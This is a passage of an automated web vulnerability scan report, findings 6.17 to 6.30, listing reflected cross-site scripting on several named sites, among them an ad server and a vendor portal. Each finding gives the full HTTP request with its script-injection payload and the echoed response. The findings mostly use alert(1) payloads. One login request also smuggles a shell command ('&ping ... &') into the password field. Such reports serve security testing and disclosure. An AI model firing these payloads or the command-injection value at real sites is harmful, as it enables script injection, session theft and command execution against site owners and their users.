Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:32 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d830da3836cd39735b3d;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:32 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:32 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4880

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?955ef"><script>alert(1)</script>eaec9f444c3=1" method="post">
...[SNIP]...

6.17. https://hourly.deploy.com/hmc/report/ [nsextt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ff7d"><script>alert(1)</script>22906d443c3 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E8ff7d"><script>alert(1)</script>22906d443c3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000002)%3c/script%3e8ff7d"><script>alert(1)</script>22906d443c3" method="post">
...[SNIP]...

6.18. https://hourly.deploy.com/hmc/report/ [register parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The value of the register request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7121"><script>alert(1)</script>df0c78cb9fa was submitted in the register parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?register=1e7121"><script>alert(1)</script>df0c78cb9fa HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:30 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?register=1e7121"><script>alert(1)</script>df0c78cb9fa" method="post" onSubmit="document.form1.register.disabled='disabled';">
...[SNIP]...

6.19. https://hourly.deploy.com/hmc/report/index.cfm ['"--> parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The value of the '"--></style></script><script>netsparker(0x00004F)</script> request parameter is copied into the HTML document as plain text between tags. The payload e83be<script>alert(1)</script>523da594bd0 was submitted in the '"--></style></script><script>netsparker(0x00004F)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?'"--></style></script><script>netsparker(0x00004F)</script>e83be<script>alert(1)</script>523da594bd0 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:07 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:07 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
</script>e83be<script>alert(1)</script>523da594bd0" method="post">
...[SNIP]...

6.20. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The value of the j_username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fe1a"><script>alert(1)</script>db5eebe2940 was submitted in the j_username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /hmc/report/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 63

j_password=%26ping%20-c%2026%20127.0.0.1%20%26&j_username=Smith7fe1a"><script>alert(1)</script>db5eebe2940

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e302c38d98d257a233c;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:03 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="Smith7fe1a"><script>alert(1)</script>db5eebe2940" onKeyPress="checkEnter();">
...[SNIP]...

6.21. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The value of the j_username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7302a"><script>alert(1)</script>4a4bb4d857e243994 was submitted in the j_username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hmc/report/index.cfm?j_password=&j_username=7302a"><script>alert(1)</script>4a4bb4d857e243994 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:32 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:32 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?j_password=&j_username=7302a"><script>alert(1)</script>4a4bb4d857e243994" method="post">
...[SNIP]...

6.22. https://hourly.deploy.com/hmc/report/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3979a"><script>alert(1)</script>e93cf277ffd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?3979a"><script>alert(1)</script>e93cf277ffd=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:33 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:33 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:33 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?3979a"><script>alert(1)</script>e93cf277ffd=1" method="post">
...[SNIP]...

6.23. https://hourly.deploy.com/hmc/report/index.cfm [nsextt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48f1"><script>alert(1)</script>05d2c68e84e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000004)%3C/script%3Ed48f1"><script>alert(1)</script>05d2c68e84e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000004)%3c/script%3ed48f1"><script>alert(1)</script>05d2c68e84e" method="post">
...[SNIP]...

6.24. https://hourly.deploy.com/hmc/report/index.cfm [register parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The value of the register request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d039e"><script>alert(1)</script>e3b5619accb was submitted in the register parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?register=1d039e"><script>alert(1)</script>e3b5619accb HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:31 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?register=1d039e"><script>alert(1)</script>e3b5619accb" method="post" onSubmit="document.form1.register.disabled='disabled';">
...[SNIP]...

6.25. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042) [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"><script>alert(1)</script>93019b07260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm/%22ns=%22netsparker(0x000042)?20ec4"><script>alert(1)</script>93019b07260=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?20ec4"><script>alert(1)</script>93019b07260=1" method="post">
...[SNIP]...

6.26. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d3a0"><script>alert(1)</script>c00f54e3219 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)?7d3a0"><script>alert(1)</script>c00f54e3219=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:11 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:11 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:11 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?7d3a0"><script>alert(1)</script>c00f54e3219=1" method="post">
...[SNIP]...

6.27. http://ib.adnxs.com/ab [cnd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4615b'-alert(1)-'2e372cc3b5e was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.4615b'-alert(1)-'2e372cc3b5e&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-O]7X=1o.SL4qu$o)jqNzHS=TC4(9F1:<#$U]bx!=zjV%>biGH%bdq58FLtlq2:d$JgUh5$4Iot#6@4.4J[*tG':4rrG+c3fEC-3df(zv7VQ@s]44`jFA-UO$V13P'.UTvPWL@iN5yP*wBe_0S+@C*@L7VvSaWmx$R!Rcj1*R:>#h2<bHAYq9bP+EfQqhMvlCKL>_w7fS(X)h1Nww_5fdG`1qm>g6vDz?4Kjlnm+'z[>O[I?A2K@R'5'-#ByUV8APmF!5j^hik=DN

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso+zUvs)2CF+[(.(>y<]pD>][8NX.G>S>V7j*s_)x:*q=s36MWy?D-?d]@6n3)XNf!R#M(IK'+%WGSupCXe=?5wnabP%erqPAShL[Uy0[f]+>:LCj1ySu%)*-+(fM0+(qUzu:>+s*?ID=v0CO9q79tdlePQ[@TNKu[vnkf?@DNFXWGQNZq=1iuS3DC; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:24:28 GMT
Content-Length: 1529

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAA
...[SNIP]...
r0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAAfyWMQQAAAAA./cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.4615b'-alert(1)-'2e372cc3b5e/referrer=http%3A%2F%2Fgames.webalta.ru%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2Nh
...[SNIP]...

6.28. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kronos.tt.omtrdc.net
Path:	/m2/kronos/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 48696<script>alert(1)</script>25fc46847c1 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail48696<script>alert(1)</script>25fc46847c1&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: kronos.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 216
Date: Mon, 25 Apr 2011 13:56:09 GMT
Server: Test & Target

mboxFactories.get('default').get('Button_cta_right_rail48696<script>alert(1)</script>25fc46847c1',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303738433760-48782.17");

6.29. http://kroogy.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kroogy.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 286d0<img%20src%3da%20onerror%3dalert(1)>5a8dc7282d8 was submitted in the REST URL parameter 1. This input was echoed as 286d0<img src=a onerror=alert(1)>5a8dc7282d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico286d0<img%20src%3da%20onerror%3dalert(1)>5a8dc7282d8 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6; __utmc=221607367; __utmb=221607367.1.10.1303738749

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2134

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Favicon.ico286d0<img src=a onerror=alert(1)>5a8dc7282d8Controller</strong>
...[SNIP]...

6.30. http://learn.shavlik.com/shavlik/index.cfm [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The value of the h request parameter is copied into an HTML comment. The payload 41f63--><script>alert(1)</script>cd0802b0b7c was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shavlik/index.cfm?m=521&pg=372&h=041f63--><script>alert(1)</script>cd0802b0b7c&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
